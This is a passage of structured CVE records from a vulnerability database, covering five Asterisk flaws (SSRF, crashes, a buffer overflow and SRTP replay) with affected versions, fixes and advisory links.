"value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26499",
"datePublished": "2022-04-15T00:00:00.000Z",
"dateReserved": "2022-03-06T00:00:00.000Z",
"dateUpdated": "2024-08-03T05:03:32.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-32558 (GCVE-0-2021-32558)
Vulnerability from cvelistv5 – Published: 2021-07-27 05:19 – Updated: 2024-08-03 23:25- n/a
| URL | Tags |
|---|---|
| http://seclists.org/fulldisclosure/2021/Jul/49 | mailing-listx_refsource_FULLDISC |
| http://packetstormsecurity.com/files/163639/Aster… | x_refsource_MISC |
| https://downloads.asterisk.org/pub/security/AST-2… | x_refsource_MISC |
| https://issues.asterisk.org/jira/browse/ASTERISK-29392 | x_refsource_MISC |
| https://lists.debian.org/debian-lts-announce/2021… | mailing-listx_refsource_MLIST |
| https://www.debian.org/security/2021/dsa-4999 | vendor-advisoryx_refsource_DEBIAN |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:25:30.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-02T10:06:13.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-32558",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"name": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-008.html",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29392",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2021/dsa-4999"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-32558",
"datePublished": "2021-07-27T05:19:34.000Z",
"dateReserved": "2021-05-11T00:00:00.000Z",
"dateUpdated": "2024-08-03T23:25:30.855Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-31878 (GCVE-0-2021-31878)
Vulnerability from cvelistv5 – Published: 2021-07-27 05:17 – Updated: 2024-08-03 23:10- n/a
| URL | Tags |
|---|---|
| http://seclists.org/fulldisclosure/2021/Jul/48 | mailing-listx_refsource_FULLDISC |
| http://packetstormsecurity.com/files/163638/Aster… | x_refsource_MISC |
| http://downloads.asterisk.org/pub/security/AST-20… | x_refsource_MISC |
| https://issues.asterisk.org/jira/browse/ASTERISK-29381 | x_refsource_MISC |
| https://downloads.digium.com/pub/security/AST-202… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:10:30.837Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-07-27T11:10:28.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-31878",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"name": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"name": "http://downloads.asterisk.org/pub/security/AST-2021-007.html",
"refsource": "MISC",
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29381",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"name": "https://downloads.digium.com/pub/security/AST-2021-007.html",
"refsource": "MISC",
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-31878",
"datePublished": "2021-07-27T05:17:05.000Z",
"dateReserved": "2021-04-29T00:00:00.000Z",
"dateUpdated": "2024-08-03T23:10:30.837Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-26713 (GCVE-0-2021-26713)
Vulnerability from cvelistv5 – Published: 2021-02-19 19:30 – Updated: 2024-08-03 20:33- n/a
| URL | Tags |
|---|---|
| https://downloads.asterisk.org/pub/security/ | x_refsource_MISC |
| https://downloads.asterisk.org/pub/security/AST-2… | x_refsource_MISC |
| https://issues.asterisk.org/jira/browse/ASTERISK-29205 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:33:40.660Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-19T19:30:30.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-26713",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://downloads.asterisk.org/pub/security/",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-004.html",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29205",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-26713",
"datePublished": "2021-02-19T19:30:30.000Z",
"dateReserved": "2021-02-05T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:33:40.660Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-26712 (GCVE-0-2021-26712)
Vulnerability from cvelistv5 – Published: 2021-02-18 20:10 – Updated: 2024-08-03 20:33- n/a
| URL | Tags |
|---|---|
| https://downloads.asterisk.org/pub/security/ | x_refsource_MISC |
| http://seclists.org/fulldisclosure/2021/Feb/59 | mailing-listx_refsource_FULLDISC |
| https://downloads.asterisk.org/pub/security/AST-2… | x_refsource_CONFIRM |
| https://issues.asterisk.org/jira/browse/ASTERISK-29260 | x_refsource_CONFIRM |
| http://packetstormsecurity.com/files/161473/Aster… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:33:40.803Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Feb/59"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-19T15:06:09.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Feb/59"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-26712",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://downloads.asterisk.org/pub/security/",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Feb/59"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-003.html",
"refsource": "CONFIRM",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29260",
"refsource": "CONFIRM",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
},
{
"name": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-26712",
"datePublished": "2021-02-18T20:10:20.000Z",
"dateReserved": "2021-02-05T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:33:40.803Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}